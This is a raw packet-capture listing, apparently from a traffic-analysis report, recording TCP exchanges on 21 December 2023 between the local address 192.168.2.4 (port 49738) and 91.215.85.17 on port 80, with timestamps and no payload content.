                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.633245945 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.633300066 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.633430004 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.633475065 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.633527040 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.633640051 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.633675098 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.633717060 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.633759022 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.633796930 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.633841991 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.633949041 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634011030 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634099007 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634167910 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634207010 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634238958 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634310007 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634347916 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634391069 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634438038 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634474039 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634527922 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634578943 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634622097 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634630919 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634670019 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634699106 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634711027 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634742975 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634773970 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634787083 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634919882 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634959936 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.634983063 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635121107 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635164022 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635258913 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635294914 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635332108 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635360003 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635432959 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635473967 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635519981 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635552883 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635588884 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635647058 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635660887 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635694027 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635700941 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635735989 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635768890 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635806084 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635843039 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635879040 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.635926962 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.636223078 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.636267900 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.636303902 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.636415958 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.636455059 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.636487961 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.636559963 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.636598110 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.636648893 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.636709929 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.636749029 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.636795998 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.636895895 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.636935949 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.636966944 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637020111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637058020 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637099981 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637192011 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637233973 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637285948 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637351036 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637387037 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637435913 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637495041 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637535095 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637581110 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637675047 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637716055 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637774944 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637839079 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637876987 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637895107 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.637974024 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638012886 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638047934 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638067007 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638103008 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638192892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638221025 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638258934 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638271093 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638344049 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638384104 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638431072 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638458967 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638498068 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638505936 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638597965 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638636112 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638644934 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638717890 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638760090 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638767958 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638825893 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638864040 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.638909101 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.639034033 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.639090061 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.639194012 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.639275074 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.639318943 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.639350891 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.639435053 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.639484882 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.639516115 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.639559031 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.639600992 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.639659882 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.639720917 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.639760971 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.639813900 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.639889956 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.639929056 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.639988899 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.640075922 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.640120983 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.640145063 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.640221119 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.640259027 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.640311956 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.640419006 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.640460014 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.640470982 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.640530109 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.640571117 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.640608072 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.640754938 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.640794992 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.640866041 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.640944004 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.640984058 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.641046047 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.641128063 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.641166925 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.641195059 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.641264915 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.641304970 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.641352892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.641531944 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.641576052 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.641578913 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.641691923 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.641735077 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.641765118 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.641813040 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.641851902 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.641901970 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.642015934 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.642067909 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.642093897 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.642196894 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.642245054 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.642246008 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.642307997 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.642345905 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.642394066 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.642482042 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.642530918 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.642561913 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.642621994 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.642662048 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.642697096 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.642779112 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.642817974 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.642968893 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.643116951 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.643158913 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.643187046 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.643276930 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.643316031 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.643337011 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.643470049 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.643520117 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.643580914 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.643738985 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.643781900 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.643807888 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.643953085 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.643996000 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.644149065 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.644265890 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.644313097 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.644366026 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.644455910 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.644495964 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.644566059 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.644649029 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.644687891 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.644740105 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.644860029 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.644902945 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.644948959 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645070076 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645112991 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645145893 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645205975 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645242929 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645246029 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645308971 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645349979 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645379066 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645448923 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645520926 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645569086 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645658970 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645704031 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645706892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645757914 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645797014 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645827055 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645884991 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645924091 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.645961046 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.646060944 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.646116018 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.646189928 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.646271944 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.646311045 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.646363020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.646387100 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.646425009 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.646476030 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.646630049 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.646642923 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.646671057 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.646696091 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.646733999 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.646738052 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.646856070 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.646892071 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.646958113 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.647056103 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.647097111 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.647145987 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.647196054 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.647233963 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.647269964 CET804973891.215.85.17192.168.2.4
